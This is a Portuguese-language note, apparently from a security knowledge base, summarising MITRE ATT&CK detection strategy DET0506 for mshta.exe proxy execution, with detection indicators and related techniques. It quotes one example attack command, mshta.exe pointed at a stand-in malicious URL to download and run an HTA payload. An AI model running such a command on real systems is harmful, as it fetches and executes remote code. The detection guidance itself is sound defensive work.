det0506-detecting-mshta-based-proxy-execution-via-suspicious-hta-or-script-invoc

# DET0506 — Detecting Mshta-based Proxy Execution via Suspicious HTA or Script Invocation ## Descrição `mshta.exe` (Microsoft HTML Application Host) é um binário legítimo do Windows que executa arquivos HTA (HTML Application) e pode ser abusado como LOLBIN para executar código JavaScript ou VBScript arbitrário, tanto a partir de arquivos locais quanto de URLs remotas. Adversários utilizam `mshta.exe` para proxy execution de payloads maliciosos, evitando restrições de execução de scripts e controles de AppLocker/WDAC em muitos ambientes. A técnica é mapeada como [[T1218.005-system-binary-proxy-execution-mshta|T1218.005]] no MITRE ATT&CK. O uso de `mshta.exe` para executar URLs remotas é especialmente problemático: `mshta.exe http://malicious.site/payload.hta` baixa e executa código sem alertar o usuário e frequentemente sem acionar a sandbox de download de arquivos. Campanhas de phishing de grupos como [[g0094-kimsuky|Kimsuky]], [[g0016-apt29|APT29]] e [[ta505|TA505]] documentadamente usaram HTA como vetor de execução inicial, frequentemente combinado com engenharia social para induzir o usuário a clicar em arquivos HTA anexados. A detecção foca em padrões de invocação suspeita de mshta: execução de URLs remotas, invocação a partir de processos pais incomuns (Office, browsers, scripts), e execução de código VBScript/JavaScript que realiza ações de system-level (download de arquivos, modificação de registro, criação de processos). O process tree resultante revela a cadeia completa de execução. ## Indicadores de Detecção - `mshta.exe` executado com URL remota como argumento (`mshta.exe http://...`) - `mshta.exe` iniciado como processo filho de WINWORD.EXE, EXCEL.EXE ou browser (chrome, firefox, iexplore) - HTA gerando conexão de rede de saída imediatamente após execução - Script VBScript/JScript dentro de HTA invocando `WScript.Shell.Run` ou `CreateObject("Scripting.FileSystemObject")` - `mshta.exe` executando arquivo HTA localizado em `%TEMP%`, `%APPDATA%` ou diretório de download - HTA criando processo filho `cmd.exe` ou `powershell.exe` com argumentos suspeitos - Arquivo HTA recebido por e-mail como anexo e executado diretamente pelo cliente de e-mail ## Técnicas Relacionadas - [[T1218.005-system-binary-proxy-execution-mshta|T1218.005 — Mshta]] - [[t1218-system-binary-proxy-execution|T1218 — System Binary Proxy Execution]] - [[T1059.007-javascript|T1059.007 — JavaScript]] - [[t1204-user-execution|T1204 — User Execution]] - [[T1566.001-phishing-spearphishing-attachment|T1566.001 — Spearphishing Attachment]] ## Analytics Relacionadas - [[an1397-analytic-1397|AN1397 — Analytic 1397]] --- *Fonte: [MITRE ATT&CK — DET0506](https://attack.mitre.org/detectionstrategies/DET0506)*